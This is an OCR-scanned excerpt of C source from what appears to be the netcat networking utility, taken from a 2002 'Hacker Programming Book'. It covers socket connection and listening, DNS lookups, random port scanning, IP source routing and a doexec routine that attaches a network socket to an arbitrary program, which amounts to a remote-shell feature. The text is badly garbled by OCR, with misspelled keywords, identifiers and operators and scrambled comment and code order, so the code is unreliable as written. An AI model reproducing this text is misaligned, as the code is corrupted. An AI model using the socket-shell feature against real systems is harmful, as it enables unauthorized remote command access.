"tcp"; /* for getservby* */ 
"udp"; 



iifndef WIN32 
iifdef HAVE_BIND 
extern int h_errno; 
iendif 
iendif 

int gatesidx = 0; 
int gatesptr = 4; 
USHORT Single = 1; 
unsigned int insaved = 
unsigned int wrote_out 
unsigned int wrote net 



0; 

= 0; 
= 0; 



static char wrote_txt[] = 



/* LSRR hop count */ 

/* initial LSRR pointer, settable */ 
/* zero if scanning */ 

/* stdin— buffer size for multi— mode */ 
/* total stdout bytes */ 
/* total net bytes */ 
sent %d, rcvd %d"; 



static char hexnibs [20] = " 01234567 89abcdef 



/* will malloc up the following globals : */ 



struct timeval * timerl = NULL; 
struct timeval * timer2 = NULL; 
SAI * lclend = NULL; /* 
SAI * remend = NULL; 
HINF ** gates = NULL; /* 
char * optbuf = NULL; /* 
char * bigbuf_in; /* 
char * bigbuf_net; 
fd set * dingl; 
fd_set * ding2; 
PINF * portpoop = NULL; 
unsigned char * stage = NULL; /* hexdump line buffer */ 



sockaddr^in structs */ 

LSRR hop hostpoop */ 
LSRR or sockopts */ 
data buffers */ 

/* for select loop */ 

/* for getportpoop / getservby* */ 



iifdef WIN32 

char * setsockopt_c; 
int nnetfd; 
iendif 



/* global cmd flags: */ 
USHORT o_alla = 0; 
unsigned int o^interval = 0; 
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USHORT o_nflag = 0; 
U SHORT o_wfile = 0; 
USHORT o^random = 0; 
USHORT o_udpmode = 0; 
USHORT o_verbose = 0; 
unsigned int o_wait = 0; 
USHORT orzerò = 0; 



/* Debug macro: squirt whatever to stderr and sleep a bit so we can see it go 
by. need to cali like Debug ( (stuff) ) [with no ; ] so macro args match! 
Beware: writes to stdOUT. . . */ 

Hfdef DEBUG 

idefine Debug (x) printf x; printf ("\n") ; fflush (stdout) ; sleep (1) ; 
ielse 

idefine Debug (x) /* nil... */ 

iendif 

/* support routines — the bulk of this thing. Placed in such an order that 
we don't have to forward—declare anything: */ 



int helpme(); /* oop */ 
Hfdef WIN32 



/* res_init 

winsock needs to be initialized. Might as well do it as the resinit 
cali for Win32 */ 



void res_init () 
{ 

WORD wVersionRequested; 
WS ADATA wsaData; 
int err; 

wVersionRequested = MAKEWORD (1, 1) ; 

err = WSAStartup (wVersionRequested, SwsaData) ; 

if (err != 0) 

/* Teli the user that we couldn't find a useable */ 

/* winsock.dll. */ 

return; 

/* Confirm that the Windows Sockets DLL supports 1.1.*/ 
/* Note that if the DLL supports versions greater */ 
/* than 1.1 in addition to 1.1, it will stili return */ 
/* 1.1 in wVersion since that is the version we */ 
/* requested. */ 

if ( LOBYTE ( wsaData . wVersion ) != 1 II 

HIBYTE ( wsaData . wVersion ) != 1 ) { 
/* Teli the user that we couldn't find a useable */ 
/* winsock.dll. */ 
WSACleanup () ; 
return; 
) 



} 



/* winsockstr 

Windows Sockets cannot report errors through perror () so we need to de fine 
our own error strings to print . Someday ali the string should be prettied up. 
Prettied the errors I usually get */ 

char * winsockstr (error) 

int error; 

{ 

switch (error) 
( 



case 


WSAEINTR 


: return ("INTR 


"); 


case 


WSAEBADF 


: return ("BADE 


"); 


case 


WSAEACCES 


: return ( "ACCES 


"); 


case 


WSAEFAULT 


: return ("FAULT 


"); 


case 


WSAEINVAL 


: return ("INVAL 


"); 


case 


WSAEMFILE 


: return ( "MFILE 


"); 


case 


WSAEWOULDBLOCK 


: return ( "WOULDBLOCK 


"); 


case 


WSAEINPROGRESS 


: return ("INPROGRESS 


"); 


case 


WSAEALREADY 


: return ( "ALREADY 


"); 
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case 


WSAEDESTADDRREQ 


return 


' "DESTADDRREQ 


" ì ' 


case 


WSAEMSGSIZE 


return 


' "MSGSIZE 


" ì ' 


case 


WSAEPROTOTYPE 


return 


' "PROTOTYPE 


" ì ' 


case 


WSAENOPROTOOPT 


return 


' "NOPROTOOPT 


" ) ' 


case 


WSAEPROTONOSUPPORT : 


return 


' "PROTONOSUPPORT 


" ) ' 


case 


WSAESOCKTNOSUPPORT : 


return 


' " S0CKTN0SUPP0R1 


ti 1 . 


case 


WSAEOPNOTSUPP 


return 


' "OPNOTSUPP 


" ) * 


case 


WSAEPFNOSUPPORT 


return 


' "PFNOSUPPORT 


" ) ' 


case 


WSAEAFNOSUPPORT 


return 


' "AFNOSUPPORT 


» J . 


case 


WSAEADDRINUSE 


return 


' "ADDRINUSE 


" ì ' 


case 


WSAEADDRNOTAVAIL 


return 


' "ADDRNOTAVAIL 


" ì ' 


case 


WSAENETDOWN 


return 


'"NETDOWN 


" ) ' 


case 


WSAENETUNREACH 


return 


' "NETUNREACH 


" ) * 


case 


WSAENETRESET 


return 


' "NETRESET 


" ) ' 


case 


WSAECONNABORTED 


return 


' "CONNABORTED 


" ) * 


case 


WSAECONNRESET 


return 


' "CONNRESET 


" ) ' 


case 


WSAENOBUFS 


return 


"NOBUFS 


n i . 


case 


WSAEISCONN 


return 


' "ISCONN 


ti j . 


case 


WSAENOTCONN 


return 


' "NOTCONN 


ti j . 


case 


WSAESRUTDOWN 


return 


' "SHUTDOWN 


ti j . 


case 


WSAETOOMANYREFS 


return 


' " TOOMANYREFS 


ti j . 


case 


WSAETIMEDOUT 


return 


"TIMEDOUT 


" ) ' 


case 


WSAECONNREFUSED 


return 


'"connection refused") ; 


case 


WSAELOOP 


return 


' "LOOP 


ti \ . 


case 


WSAENAMETOOLONG 


return 


' "NAMETOOLONG 


ti \ . 


case 


WSAEHOSTDOWN 


return 


' "HOSTDOWN 


ti \ . 


case 


WSAEHOSTUNREACH 


return 


"HOSTUNREACH 


ti i . 


case 


WSAENOTEMPTY 


return 


' "NOTEMPTY 


ti \ . 


case 


WSAEPROCLIM 


return 


' "PROCLIM 


ti \ . 


case 


WSAEUSERS 


return 


' "USERS 


ti \ . 


case 


WSAEDQUOT 


return 


' "DQUOT 


ti \ . 


case 


WS AE STALE 


return 


' "STALE 


ti j . 


case 


WSAEREMOTE 


return 


' "REMOTE 


ti \ . 


case 


WSAEDISCON 


return 


' "DISCON 


ti \ . 

t / 


case 


WSASYSNOTREADY 


return 


' "SYSNOTREADY 


"); 


case 


WSAVERNOTSUPPORTED : 


return 


' "VERNOTSUPPORTED ") ; 


case 


WSANOTINITIALISED : 


return 


' "NOTINITIALISED 


"); 


case 


WSAHOST_NOT_FOUND : 


return 


' "ROST_NOT_FOVND 


"); 


case 


WSATRY_AGAIN 


return 


' "TRY_AGAIN 


"); 


case 


WSANO__RECOVERY 


return 


' "NO_RECOVERY 


"); 


case 


WSANO_DATA 


return 


' "NO_DATA 


"); 



default : return ("unknown socket error") ; 
} 

} 

iendif 



/* holler : 

fake varargs — need to do this way because we wind up calling through 
more levels of indirection than vanilla varargs can handle, and not ali 
machines have vfprintf/vsyslog/whatever! 6 params oughta be enough. */ 
void holler (str, pi, p2, p3, p4, p5, p6) 
char * str; 

char * pi, * p2, * p3, * p4, * p5, * p6; 

{ 

if (o_verbose) { 

fprintf (stderr, str, pi, p2, p3, p4, p5, p6) ; 
iifdef WIN32 

if (h^errno) 

fprintf (stderr, ": %s\n" , winsockstr (h_errno) ) ; 

#else 

if (ermo) { /* this gives funny—looking messages , but */ 

perror (" "); /* it's more portable than sys_errlist [] . . . */ 

} /* xxx: do something better. */ 

iendif 

else 

fprintf (stderr, "\n") ; 
fflush (stderr) ; 

} 

} /* holler */ 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



char * str; 

char * pi, * p2, * p3, * p4, * p5, * p6; 

{ 

o_yerbose = 1; 

holler (str, pi, p2, p3, p4, p5, p6) ; 
iifdef WIN32 

closesocket (netfd) ; 
#else 

dose (netfd) ; 
iendif 

sleep (1) ; 

exit (1) ; 
} /* ball */ 

/* catch : 

no-brainer interrupt handler */ 
void catch () 
{ 

ermo = 0; 

if (o_verbose > 1) /* normally we don't care */ 

ball (wrote_txt, wrote_net, wrote_out) ; 

ball (" punti") ; 

} 

/* timeout and other signal handling cruft */ 

void tmtravel () 

{ 

iifdef NTFIXTHIS 

signal (SIGALRM, SIG^IGN) ; 

alanti (0) ; 
iendif 

if (jval == 0) 

bail ( "spurious timer interrupt ! ") ; 

longjmp (jbuf, jval); 

} 



UINT theTimer; 
/* arai : 

set the timer. Zero secs arg means unarm */ 
void arai (num, secs) 
unsigned int num; 
unsigned int secs; 

{ 

iifdef WIN32 

HANDLE stdhnd; 

stdhnd = GetStdHandle (STD_OUTPUT_HANDLE) ; 
iifdef DEBUG 

if (stdhnd != INVALID_HANDLE_VALUE) 

printf ( "handle is %ld\n", stdhnd); 

else 

printf ("failed to get stdhndl\n") ; 

iendif 
ielse 

if (secs == 0) { /* reset */ 

signal (SIGALRM, SIG_IGN) ; 
alarm (0) ; 
jval = 0; 

} else { /* set */ 

signal (SIGALRM, tmtravel) ; 
alarm (secs); 
jval = num; 
} /* if secs */ 
iendif /* WIN32 */ 
} /* arai */ 

/* Hmalloc : 

malloc up what I want, rounded up to *4, and pre-zeroed. Either succeeds 
or bails out on its own, so that callers don't have to worry about it . */ 



char * Hmalloc (size) 
unsigned int size; 
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char * p = malloc (s) ; 
if (p '.= NULL) 

memset (p, 0, s) ; 
else 

bail ("Hmalloc %d failed", s) ; 
return (p) ; 
} /* Hmalloc */ 



/* flndline : 

find the next newline in a buffer; return inclusive size of that "line", 
or the entire buffer size, so the Caller knows how much to then write () . 



Not distinguishing \n vs 
unsigned int findline (buf, 
char * buf; 
unsigned int siz; 



\r\n 
siz) 



for the nonce; it just works as is. 



*/ 



/* various sanity checks . . . */ 



register char * p; 
register int x; 
if (! buf) 

return (0) ; 
if (siz > BIGSIZ) 

return (0) ; 
x = siz; 

for (p = buf; x > 0; x — ; { 
if (*p == '\n') { 

x = (int) (p - buf) ; 
x++; /* 
Debug ( ("findline returning %d" 
return (x) ; 

} 

p++; 
) /* for */ 

Debug ( ("findline returning whole thing: %d", siz)) 

return (siz) ; 
} /* findline */ 



'sokay if it points just past the end! */ 
x)) 



/* comparehosts : 

cross-check the host_poop we have so far against new gethostby* () info, 
and holler about mismatches . Perhaps gratuitous, but it can't hurt to 
point out when someone's DNS is fukt. Returns 1 if mismatch, in case 
someone else wants to do something about it. */ 
int comparehosts (poop, hp) 

HINF * poop; 

struct hostent * hp; 

{ 

ermo = 0; 
iifndef WIN32 

h ermo = 0; 
iendif 

/* The DNS spec is officially case-insensitive, but for those times when you 

*really* wanna see any and ali discrepancies , by ali means define this . */ 
Hfdef ANAL 

if (strcmp (poop->name, hp->h_name) != 0) { /* case-sensitive */ 

#else 

if (strcasecmp (poop—>name, hp—>h_name) 1=0) { /* normal */ 
iendif 

holler ("DNS fwd/rev mismatch: %s != %s", poop->name, hp—>h_name); 
return (1) ; 

} 

return (0) ; 

/* . . . do we need to do anything over and above that?? */ 
} /* comparehosts */ 

/* gethostpoop : 

resolve a host 8 ways from sunday; return a new host__poop struct with its 
info. The argument can be a name or [ascii] IP address; it will try its 
damndest to deal with it. "numeric" governs whether we do any DNS at ali, 
and we also check o_yerbose for what ' s appropriate work to do. */ 
HINF * gethostpoop (name, numeric) 

char * name; 

USHORT numeric; 



struct hostent * hostent; 
struct in__addr iaddr; 
register HINF * poop = NULL; 
register int 
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/* I really want to strangle the twit who dreamed up ali these sockaddr and 
hostent abstractions, and then forced them ali to be incompatible wlth 
each other so you *HAVE* to do ali this ridiculous casting back and forth. 
If that wasn't bad enough, ali the doc insists on referring to locai ports 
and addresses as "names", which makes NO sense down at the bare metal. 

What an absolutely horrid paradigm, and to think of ali the people who 
have been wasting signi ficant amounts of time fighting with this stupid 
deliberate obfuscation over the last 10 years . . . then again, I like 
languages wherein a pointer is a pointer, what you put there is your own 
business, the compiler stays out of your face, and sheep are nervous . 
Maybe that 's why my C code reads like assembler half the time. . . */ 

/* If we want to see ali the DNS stuff, do the following hair — 

if inetaddr, do reverse and forward with any warnings; otherwise try 
to do forward and reverse with any warnings. In other words, as long 
as we're here, do a complete DNS check on these clowns. Yes, it slows 
things down a bit for a first run, but once it ' s cached, who cares? */ 

ermo = 0; 
iifndef WIN32 

h_errno = 0; 
iendif 

if (name) 

poop = (HINF *) Hmalloc (sizeof (HINF) ) ; 
if (! poop) 

bail ( "gethostpoop fuxored") ; 
strcpy (poop->name, unknown) ; /* preload it */ 

/* see wzv : workarounds . c for dg/ux return-a-struct inet_addr lossage */ 
iaddr.s_addr = inet_addr (name); 

if (iaddr . s_addr == INADDR_NONE) { /* here' s the great split: names... */ 
if (numeric) 

bail ("Can't parse %s as an IP address", name); 
hostent = gethostbyname (name) ; 
if ('. hostent) 

/* failure to look up a name is fatai, since we can't do anything with it */ 
/* XXX: h_errno only if BIND? look up how telnet deals with this */ 

bail ("%s: forward host lookup failed: h errno %d", name, h__errno) ; 
strncpy (poop—>name, hostent— >h_name , sizeof (poop—>name) ) ; 
for (x = 0; hostent->h_addr_list[x] SS (x < 8); x++) { 

memcpy (Spoop->iaddrs [x] , hostent->h_addr__list [x] , sizeof (IA) ) ; 
strncpy (poop->addrs [x] , inet__ntoa (poop->iaddrs [x] ) , 
sizeof (poop->addrs [0] ) ) ; 
) /* for x -> addrs, part A */ 

if (! o__verbose) /* if we didn't want to see the */ 

return (poop); /* inverse stuff, we're done. */ 

/* do inverse lookups in separate loop based on our collected forward addrs, 
since gethostby* tends to crap into the same buffer over and over */ 
for (x = 0; poop—>iaddrs [x] . s_addr SS (x < 8); x++) { 
hostent = gethostbyaddr ( (char *) Spoop->iaddrs [x] , 

sizeof (IA), AF_ INET ) ; 
if ((! hostent) Il (! hostent-> h_name) ) 
holler ( "Warning: inverse host lookup failed for %s: h ermo %d", 
poop->addrs [x] , h_errno) ; 
else 

(void) comparehosts (poop, hostent) ; 
) /* for x -> addrs, part B */ 

} else ( /* not INADDR_NONE: numeric addresses . . . */ 

memcpy (poop—>iaddrs, Siaddr, sizeof (IA) ) ; 

strncpy (poop->addrs [0] , inet_ntoa (iaddr), sizeof (poop->addrs) ) ; 
if (numeric) /* if numeric-only , we 're done */ 

return (poop) ; 

if (! o_verbose) /* likewise if we don't want */ 

return (poop); /* the full DNS hair */ 

hostent = gethostbyaddr ( (char *) Siaddr, sizeof (IA) , AF_INET) ; 
/* numeric or not, failure to look up a PTR is *not* considered fatai */ 
if (! hostent) 

holler ("%s: inverse host lookup failed: h_errno %d", name, h errno); 
else { 

strncpy (poop->name, hostent->h_name , MAXHOSTNAMELEN - 2) ; 

hostent = gethostbyname (poop->name) ; 

if ((! hostent) Il (! hostent->h__addr_list [0] ) ) 

holler ("Warning: forward host lookup failed for %s: h_errno %d", 
poop->name, h_errno) ; 
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(void) comparehosts (poop, hostent) ; 
} /* if hostent */ 
} /* INADDR^NONE Great Split */ 

/* whatever—all went down previously, we should now have a host poop struct 

with at least one IP address in it. */ 
Hfndef WIN32 

h_errno = 0; 
iendif 

return (poop); 
} /* gethostpoop */ 

/* getportpoop : 

Same general idea as gethostpoop — look up a port in /etc/services, fili 
in global port_poop, but return the actual port *number* . Pass ONE of: 
pstring to resolve stuff like "23" or "exec" ; 
pnum to reverse-resolve something that 's already a number. 
If o_nflag is on, fili in what we can but skip the getservby??? stuff. 
night as well have consistent behavior here. . . */ 
USHORT getportpoop (pstring, pnum) 
char * pstring; 
unsigned int pnum; 

{ 

struct servent * servent; 
iifndef WIN32 

register int x; 

register int y; 
ielse 

u_short x; 

u_short y; 
iendif 

char * whichp = p_tcp; 

if (o_udpmode) 
whichp = p_udp; 

portpoop->name [ 0 ] = '?'; /* fast preload */ 

portpoop->name [1] = ' \ 0 ' ; 

/* case 1 : reverse- lookup of a number; placed first since this case is much 
more frequent if we 're scanning */ 
if (pnum) { 

if (pstring) /* one or the other, pleeze */ 

return (0) ; 
x = pnum; 

if (o_nflag) /* go faster, skip getservbyblah */ 

goto gp_finish; 

y = htons (x) ; /* gotta do this — see Fig. 1 below */ 

servent = getservbyport (y, whichp) ; 
if (servent) { 

y = ntohs (servent->s _port) ; 

if (x != y) /* "never happen" */ 

holler ( "Warning: port-bynum mismatch, %d .'= %d", x, y) ; 
strncpy (portpoop->name , servent->s_name , sizeof (portpoop~>name) ) ; 
) /* if servent */ 
goto gp_finish; 
} /* if pnum */ 

/* case 2: resolve a string, but we stili give preference to numbers instead 
of trying to resolve conflicts . None of the entries in *my* extensive 
/etc/services begins with a digit, so this should "always work" unless 
you're at 3com and have some company— internai services defined. . . */ 
if (pstring) { 

if (pnum) /* one or the other, pleeze */ 

return (0) ; 
x = atoi (pstring) ; 
if (x) 

return (getportpoop (NULL, x) ) ; /* recurse for numeric— string— arg */ 

if (o_nflag) /* can't use names! */ 

return (0) ; 
servent = getservbyname (pstring, whichp) ; 
if (servent) { 

strncpy (portpoop—>name , servent— >s__name, sizeof (portpoop—>name) ) ; 
x = ntohs (servent— >s__port) ; 
goto gp__finish; 
) /* if servent */ 
} /* if pstring */ 
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/* Obligatory netdb . h-inspired rant : servent . s_port is supposed to be an int. 
Despite this, we stili have to treat it as a short when copying it around. 
Not only that, but we have to convert it *back* into net order for 
getservbyport to work. Manpages generally aren 't clear on ali this, but 
there are plenty of examples in which it is just quietly done. More BSD 
lossage . . . since everything getserv* ever deals with is locai to our own 
host, why bother with ali this network— order/host— order crap at ali?! 
That should be saved for when we want to actually plug the port[s] into 
some real network calls — and guess what, we have to *re*-convert at that 
point as well . Fuckheads . */ 

gp_finish : 

/* Fall here whether or not we have a valid servent at this point, with 

x containing our [host— order and therefore useful, dammit] port number */ 
sprint f (portpoop->anum, "%d", x) ; /* always load any numeric specs! */ 
portpoop—>num = (x S Oxffff); /* ushort, remember . . . */ 

return (portpoop->num) ; 

} /* getportpoop */ 

/* nextport : 

Come up with the next port to try, be it random or whatever. "block" is 
a ptr to randports array, whose bytes [so far] carry these meanings : 

0 i gnor e 

1 to be tested 

2 tested [which is set as we find them here] 

returns a USHORT random port, or 0 if ali the t-b-t ones are used up. */ 
USHORT nextport (block) 
char * block; 

{ 

register unsigned int x; 
register unsigned int y; 

y = 70000; 
while (y > 0) { 

x = (RAND () & Oxffff); 
if (block [x] == 1) ( 
block [x] = 2; 
break; 

} 

x = 0; 

y — ; 

; /* while y */ 
if (x) 

return (x) ; 

y = 65535; /* no random one, try linear downsearch */ 

while (y > 0) { /* if they're ali used, we *must* be sure! */ 

if (block [y] == 1) ( 

block[y] = 2; 

break; 

} 

y — ; 

> /* while y */ 

±f (y) 

return (y) ; /* at least one left */ 

return (0) ; /* no more left! */ 

} /* nextport */ 

/* loadports : 

set "to be tested" indications in BLOCK, from LO to HI. Almost too small 
to be a separate routine, but makes main () a little cleaner . . . */ 
void loadports (block, lo, hi) 

char * block; 

USHORT lo; 

USHORT hi; 

{ 

USHORT x; 



if (! block) 

bail ( "loadports : no block?!"); 
if ((! lo) Il (! hi)) 




/* high safety count for rnd-tries */ 
/* try to find a not-done one. . . */ 



/* bummer . */ 
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x — ; 

} 

} /* loadports */ 

iifdef GAPING_SECURITY_HOLE 

char * prOOgie = NULL; /* global ptr to -e arg */ 

iifdef WIN32 

BOOL doexec (SOCKET ClientSocket) ; // this is in doexec. c 
#else 

/* doexec : 

fiddle ali the file descriptors around, and hand off to another prog. Sort 
of like a one—off "poor man's inetd" . This is the only section of code 
that would be security-critical, which is why it's ifdefed out by default. 
Use at your own hairy risk; if you leave shells lying around behind open 
listening ports you deserve to lose!! */ 
doexec (fd) 
int fd; 

{ 

register char * p; 

dup2 (fd, 0) ; /* the precise order of fiddlage */ 

iifdef WIN32 

closesocket (fd) ; 
ielse 

dose (fd) ; /* is apparently cruciai; this is */ 

iendif 

dup2 (0, 1) ; /* swiped directly out of "inetd". */ 

dup2 (0, 2); 

p = strrchr (prOOgie, '/'); /* shorter argv[0] */ 

if (P) 

p++; 
else 

p = prOOgie; 
Debug ( ( "gonna exec %s as %s . . . " , prOOgie, p) ) 
execl (prOOgie, p, NULL); 

ball ("exec %s failed", prOOgie); /* this gets sent out. Hmm. . . */ 
} /* doexec */ 
iendif 

iendif /* GAPING__SECURITY__HOLE */ 

/* doconnect : 

do ali the socket stuff, and return an fd for one of 
an open outbound TCP connection 
a UDP stub-socket thingie 
with appropriate socket options set up if we wanted source-routing, or 

an unconnected TCP or UDP socket to listen on. 
Examines various global o_blah flags to figure out what-all to do. */ 
int doconnect (rad, rp, lad, lp) 
IA * rad; 
USHORT rp; 
IA * lad; 
USHORT lp; 

{ 

Hfndef WIN32 

register int nnetfd; 
iendif 

register int rr; 

int x, y; 

ermo = 0; 
iifdef WIN32 

WSASetLastError (0) ; 

iendif 

/* grab a socket; set opts */ 
if (o^udpmode) 

nnetfd = socket (AF_INET, SOCK DGRAM, IPPROTO_UDP) ; 
else 

nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 
if (nnetfd < 0) 

bail ("Can't get socket") ; 
if (nnetfd == 0) /* might *be* zero if stdin was closed! */ 

nnetfd = dup (nnetfd) ; /* so fix it . Leave the old 0 hanging. */ 
iifdef WIN32 

rr = setsockopt (nnetfd, SOL__SOCKET, SO__REUSEADDR, (const char FAR *) setsockopt_c , 
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x = 1; 

rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEADDR, Sx, sizeof (x) ) ; 
iendif 

if (rr == -1) 

holler ("nnetfd reuseaddr failed") ; /* ??? */ 

#ifdef SO_REUSEPORT /* doesnt exist everywhere . . . */ 
iifdef WIN32 

rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT , &c, sizeof (c) ) ; 
#else 

rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT , Sx, sizeof (x) ) ; 
iendif 

if (rr == -1) 

holler ("nnetfd reuseport failed"); /* ??? */ 

iendif 

/* fili in ali the right sockaddr crud */ 
lclend->sin_family = AF_INET; 
remend->sin_family = AF_INET; 

/* if lad/lp, do appropriate binding */ 
if (lad) 

memcpy (Slclend->sin_addr . s_addr, lad, sizeof (IA)); 
if dp) 

lclend->sin_port = htons (lp) ; 
rr = 0; 

if (lad 1 1 lp) { 
x = (int) lp; 

/* try a few times for the locai bind, a la ftp-data-port ... */ 
for (y = 4; y > 0; y — ) { 

rr = bind (nnetfd, (SA *)lclend, sizeof (SA)); 
if (rr == 0) 
break; 

if (ermo != EADDRINUSE) 

break; 
else { 

holler ( "retrying locai %s:%d", inet__ntoa (lclend->sin_addr) , lp) ; 
sleep (1) ; 

ermo = 0; /* clear from sleep */ 

} /* if EADDRINUSE */ 
) /* for y counter */ 
} /* if lad or lp */ 
if (rr) 

bail ("Can't grab %s:%d with bind", 
inet_ntoa (lclend->sin_addr) , lp) ; 

if (o_listen) 

return (nnetfd); /* thanks, that's ali for today */ 

memcpy (&remend—>sin_addr.s_addr, rad, sizeof (IA) ) ; 
remend—>sin port = htons (rp) ; 



/* rough format of LSRR option and explanation of weirdness . 
—Option comes after IP—hdr dest addr in packet, padded to *4, and ihl > 5. 
—IHL is multiples of 4, i.e. real len = ip_hl « 2. 





type 131 


1 


; 0x83: copied, option class 0, 


number 3 




len 


1 


; of *whole* option! 






pointer 


1 


; nxt—hop—addr; 1— relative , not 


O-relative 




addrlist . . . 


var 


; 4 bytes per hop-addr 






pad-to-32 


var 


; ones, i.e. "NOP" 





-If tire want to route A -> B via hops C and D, we must add C, D, *and* B to the 
—options list . Why? Because when we hand the kernel A — > B with list C, D, B 
-the "send shuffle" inside the kernel changes it into A —> C with list D, B and 
-the outbound packet gets sent to C. If B wasn't also in the hops list, the 
—final destination would have been lost at this point . 

-When C gets the packet, it changes it to A —> D with list C , B where C is 
-the interface address that C used to forward the packet. This "records" the 
-route hop from B's point of view, i.e. which address points "toward" B. This 
-is to make B better able to return the packets. The pointer gets bumped by 4, 
-so that D does the right thing instead of trying to forward back to C. 



-When B finally gets the packet, it sees that the pointer is at the end of the 
-LSRR list and is thus "completed" . B will then try to use the packet instead 
-of forwarding it, i.e. deliver it up to some application. 
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-to B but have it return via your preconstructed source-route . Playing with 
-this and watching "tcpdump -v" is the best way to understand what's going on. 

—Only works for TCP in BSD—flavor kernels. UDP is a loss; udp input calls 
-stripoptions () early on, and the code to save the srcrt is notdef'ed. 
—Linux is also stili a loss at 1.3.X it looks like; the lsrr code is { }. . . 
-*/ 



/* if any -g arguments were given, set up source-routing . We hit this after 
the gates are ali looked up and ready to rock, any -G pointer is set, 
and gatesidx is now the *number* of hops */ 
if (gatesidx) { /* if we wanted any srcrt hops ... */ 

/* don't even bother compiling if we can't do IP options here! */ 

/* #ifdef IP_OPTIONS */ 

Hfndef WIN32 

if (! optbuf) { /* and don 't already *have* a srcrt set */ 

char * opp; /* then do ali this setup hair */ 

optbuf = Hmalloc (48) ; 
opp = optbuf; 

*opp++ = IPOPT__LSRR; /* option */ 

*opp++ = (char) 

(((gatesidx + 1) * sizeof (IA) ) + 3) & Oxff; /* length */ 

*opp++ = gatesptr ; /* pointer */ 

/* opp now points at first hop addr — insert the intermediate gateways */ 
for ( x = 0; x < gatesidx; x++) { 
memcpy (opp, gates [x]->iaddrs, sizeof (IA) ) ; 
opp += sizeof (IA) ; 

} 

/* and tack the final destination on the end [needed! ] */ 
memcpy (opp, rad, sizeof (IA) ) ; 
opp += sizeof (IA) ; 

*opp = IPOPT_NOP; /* alignment filler */ 

) /* if empty optbuf */ 
/* calculate length of whole option mess, which is (3 + [hops] + [final] + 1) , 
and apply it [have to do this every time through, of course] */ 
x = ((gatesidx + 1) * sizeof (IA) ) + 4; 

rr = setsockopt (nnetfd, IPPROTO_IP, IP_OPTIONS, optbuf, x) ; 
if (rr == -1) 

bail ("srcrt setsockopt fuxored") ; 
ielse /* IP_OPTIONS */ 

holler ("Warning: source routing unavailable on this machine, ignoring") ; 
iendif /* IP_OPTIONS*/ 
} /* if gatesidx */ 

/* wrap connect inside a timer, and hit it */ 
arm (1, o_wait) ; 
if (setjmp (jbuf) == 0) { 

rr = connect (nnetfd, (SA *)remend, sizeof (SA)); 
} else ( /* setjmp: connect failed. . . */ 

rr = —1; 
iifdef WIN32 

WSASetLastError (WSAETIMEDOUT) ; /* fake it */ 

ielse 

errno = ETIMEDOUT; /* fake it */ 

iendif 
} 

arm (0, 0) ; 
if (rr == 0) 

return (nnetfd) ; 
Hfdef WIN32 

errno = h errno; 
closesocket (nnetfd) ; 

WSASetLastError (errno) ; /* don't want to lose connect error */ 
ielse 

dose (nnetfd) ; /* clean up junked socket FD! ! */ 

iendif 

return (-1); 
} /* doconnect */ 

/* dolisten : 

just like doconnect, and in fact calls a hunk of doconnect, but listens for 
incoming and returns an open connection *from* someplace. If we were 
given host/port args, any connections from elsewhere are rejected. This 
in conjunction with local-address binding should limit things nicely. . . */ 
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USHORT rp; 
IA * lad; 
USHORT lp; 

{ 

register int nnetfd; 
register int rr; 
HINF * whozis = NULL; 
int x; 
char * cp; 
USHORT z; 
ermo = 0; 

/* Pass everything off to doconnect, who in o_listen mode just gets a socket */ 
nnetfd = doconnect (rad, rp, lad, lp) ; 
if (nnetfd <= 0) 
return (-1) ; 

if (o_udpmode) { /* apparently UDP can listen ON */ 

if ('. lp) /* "port 0", but that's not use fui */ 

bail ("UDP listen needs -p arg") ; 
} else { 

rr = listen (nnetfd, 1) ; /* gotta listen () before we can get */ 

if (rr < 0) /* our locai random port. sheesh. */ 

bail ("locai listen fuxored") ; 

} 

/* I can't believe I have to do ali this to get my own goddamn bound address 
and port number . It should just get filled in during bind() or something. 
Ali this is only useful if we didn't say —p for listening, since if we 
said —p we *know* what port we ' re listening on. At any rate we won't bother 
with it ali unless we wanted to see it, although listening quietly on a 
random unknown port is probably not very useful without "netstat" . */ 
if (o_verbose) { 

x = sizeof (SA); /* how 'bout getsockNUM instead, pinheads?! */ 

rr = getsockname (nnetfd, (SA *) lclend, &x) ; 
if (rr < 0) 
holler ("locai getsockname failed") ; 
strcpy (bigbuf_net, "listening on ["); /* buffer reuse... */ 
if (lclend— >sin_addr . s__addr) 

strcat (bigbuf_net, inet_ntoa (lclend->sin_addr) ) ; 
else 

strcat (bigbuf_net, "any"); 
strcat (bigbuf_net, "] %d ..."); 
z = ntohs (lclend— >sin_port) ; 
holler (bigbuf_net, z) ; 
} /* verbose — whew! ! */ 

/* UDP is a speeeeecial case — we have to do I/O *and* get the calling 
party 's particulars ali at once, listen () and accept () don't apply. 
At least in the BSD universe, however, recvfrom/PEEK is enough to teli 
us something carne in, and we can set things up so straight read/write 
actually does work after ali. Yow. YMMV on strange platforms! */ 
if (o_udpmode) { 

x = sizeof (SA) ; /* retval for recvfrom */ 

arm (2, o_wait) ; /* might as well timeout this, too */ 

if (setjmp (jbuf) == 0) { /* do timeout for initial connect */ 
rr = recvfrom /* and here we block. . . */ 

(nnetfd, bigbuf_net, BIGSIZ, MSG_PEEK, (SA *) remend, &x) ; 
Debug ( ( "dolisten/ recvfrom ding, rr = %d, netbuf %s ", rr, bigbuf__net) ) 
) else 

goto dol_tmo; /* timeout */ 

arm (0, 0) ; 

/* l 'm not completely clear on how this works — BSD seems to make UDP 

just magically work in a connect () ed context, but we'll undoubtedly run 

into systems this deal doesn't work on. For now, we apparently have to 

issue a connect () on our just—tickled socket so we can write() back. 

Again, why the fuck doesn 't it just get filled in and taken care of?! 

This hack is anything but optimal. Basically, if you want your listener 

to also be able to send data back, you need this connect () line, which 

also has the side effect that now anything fram a different source or even a 

different port on the other end won't show up and will cause ICMP errors. 

I guess that's what they meant by "connect" . 

Let 's try to remember what the "U" is *really* for, eh? 



*/ 



rr = connect (nnetfd, (SA *) remend, sizeof (SA)); 
goto whoisit; 
/* o_udpmode */ 
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/* fall here for TCP */ 

x = sizeof (SA); 

arm (2, o_wait) ; 

if (setjmp (jbuf) == 0) { 

rr = accept (nnetfd, (SA *) remend, &x) ; 

} else 

goto dol_tmo; 

arm (0, 0) ; 
iifdef WIN32 

closesocket (nnetfd) ; 
ielse 

dose (nnetfd) ; 
